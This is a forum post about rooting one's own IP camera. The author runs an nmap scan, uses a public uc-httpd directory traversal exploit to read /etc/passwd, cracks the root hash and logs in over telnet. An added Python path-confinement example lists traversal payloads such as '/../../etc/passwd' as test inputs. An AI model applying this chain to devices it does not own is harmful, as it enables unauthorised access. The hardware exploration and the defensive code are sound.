Topic: How I got root on my camera

July 02, 2017, 04:22:42 pm
My camera uses a mobile app (Showmo) to use a China based cloud service for all device control. I tried to http directly to the camera with my browser but all I get is a blank listing of "Index of /mnt/web/".

So I did a bit of sleuthing and found this:

https://nmap.org/book/vscan.html

So I tried that out:

Code:
$ nmap -sV -T4 -F my.camera.ip.address
This reports the following:

Code:
Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-02 15:41 EDT
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

So it's running uc-httpd 1.0.0. Well, a bit of googling later I came to learn that this is an httpd with a directory traversal bug.

https://packetstormsecurity.com/files/142131/XiongMai-uc-http-1.0.0-Local-File-Inclusion-Directory-Traversal.html

And there's a little python program provided to attack my camera.

Code:
$ python2 pwn.py http://192.168.1.121
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....
root:my-password-hash-here::/root:/bin/sh

So then I fed this into johntheripper with gpu acceleration and I got my root password in a few minutes.

Code:
$ telnet 192.168.1.121
Trying 192.168.1.121...
Connected to 192.168.1.121.
Escape character is '^]'.
IPC365 login: root
Password:
login: can't chdir to home directory '/root'
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.faraday.com/



BusyBox v1.19.4 (2014-12-19 12:49:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

So I poked around and learned this is a GM8136 device.

I noticed that an SDK for a similar chip was available on openipcam, so I used that filename as an example of the naming convention and searched for "GM8136 SDK release v1.0.rar" and discovered dozens of download links. I had to guess what a download button looks like in Chinese, but I figured it out.

Following the instructions in the SDK, I was able to cross-compile a full copy of busybox and get it into my /tmp/ directory, and it works beautifully.

Poking around, I've learned the following:

Essentially all of the application code lives in an encrypted (blowfish-448) ELF which uses a common unix command as its filename (possibly to make googling harder). The encrypted ELF has formatted the SD card to the WFS0.4 encrypted filesystem so it can no longer be mounted and used to store my own application data between reboots. Also, whenever I try to kill the encrypted ELF process, the camera promptly reboots after a short delay.

So the punchline is that I have root over telnet, but I cannot access the camera output, my images, or my videos. I can run my own code, but I'm stuck for now with this mystery app that may or may not be adequately secured and could conceivably already be compromised with no way for me to tell.

One bit of good news is that /proc/config.gz is present if I decided to try to roll my own kernel.

So that's how I got this far. I hope my experience helps others to explore their own cameras.

Anyway, what now?
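The directory traversal class of bug mentioned above (an httpd handing out files outside its document root), shown from the server's side as an added example that is not code from the post or from uc-httpd: a request-path resolver that decodes, normalises and then confines every request to the document root, rejecting anything that would escape it. DOCROOT mirrors the "/mnt/web" listing seen on the camera, the sample requests are constructed, and the check is purely lexical, so a root that contains symlinks also needs a realpath check at open time.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root, matching the "Index of /mnt/web/" listing on the camera.
DOCROOT = "/mnt/web"


def resolve_request_path(docroot, request_path):
    """Map an HTTP request path onto a file under docroot.

    Returns the confined filesystem path, or None when the request would
    escape the document root. This is the check an embedded httpd has to
    perform before it opens anything.
    """
    # Decode percent-encoding twice so a double-encoded ".." (%252e%252e)
    # does not survive a single decode and get past the checks below.
    decoded = unquote(unquote(request_path))
    # A NUL byte terminates C strings and could hide a suffix from later checks.
    if "\x00" in decoded:
        return None
    # Drop query and fragment parts before looking at the path itself.
    decoded = decoded.split("?", 1)[0].split("#", 1)[0]
    # Treat backslashes as separators too, so "..\\" cannot dodge the ".." handling.
    decoded = decoded.replace("\\", "/")
    # Join onto the root and collapse ".", ".." and "//" lexically.
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Confinement: the resolved path must be the root itself or sit below it.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests: ordinary ones resolve, traversal attempts are refused.
    for req in ["/index.html", "/img/../index.html", "/../../etc/passwd",
                "/%2e%2e/%2e%2e/etc/passwd", "/%252e%252e/etc/passwd"]:
        print(f"{req!r:32} -> {resolve_request_path(DOCROOT, req)}")
```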